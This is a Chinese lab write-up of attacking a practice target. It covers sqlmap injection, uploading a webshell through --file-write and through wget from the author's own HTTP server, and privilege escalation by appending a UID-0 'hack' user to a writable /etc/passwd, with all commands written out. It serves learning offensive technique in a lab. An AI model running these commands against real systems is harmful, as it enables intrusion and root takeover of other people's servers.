继续！

开扫

继续先测试web

sql注入 直接sqlmap跑

通过注入 （sqlmap查询方式省略）

存在systemuser 不知道会不会是电脑的密码 我们解密一下然后直接试试看

然后失败 这里就没有思路了 但是我们刚刚存在一个目录 我们再扫扫看

无果 换另一个目录

扫出来了 /m3diNf0/info.php 去看看

这下就开朗了

因为这里可以获取 绝对路径 那么我们就可以直接通过 sqlmap进行getshell 这里介绍三种

第一种 --os-shell

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

我们就getshell了

第二种  --file-write

一样是通过sqlmap

来上传文件 首先写一个木马

然后通过

--file-write 木马文件 --file-dest 存放目录

上传文件

py3 .\sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --file-write C:\Users\Administrator\Desktop\1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

上传失败 但是学到了

第三种 wegt

首先就是本机开启web服务

用py即可

py3 -m http.server 8888

开启 服务后 去sqlmap的shell 中下载即可

 wget http://10.8.0.174:8888//1.php

这里因为是靶场 所以找不到本身 的ip 后面发现在openvpn里存在

这里就成功

然后我们链接后查看一下 如何提权

首先就是查看/etc/passwd的权限

-rw-r--r-- 1 www-data www-data 1664 Aug 21  2019 /etc/passwd

发现 有w 可写 那么我们就通过 openssl 伪造一下

openssl passwd -1 -salt hack 123456

然后我们看看root怎么写的

root:x:0:0:root:/root:/bin/bash

x为密码 就是上面生成的

hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0:root:/root:/bin/bash

然后通过echo写入

echo 'hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0::/root:/bin/bash' >> /etc/passwd

sudo hack 会报错

我们使用py命令

python -c 'import pty;pty.spawn("/bin/bash")'

但是最后无法实现 靶机被打坏了。。。。。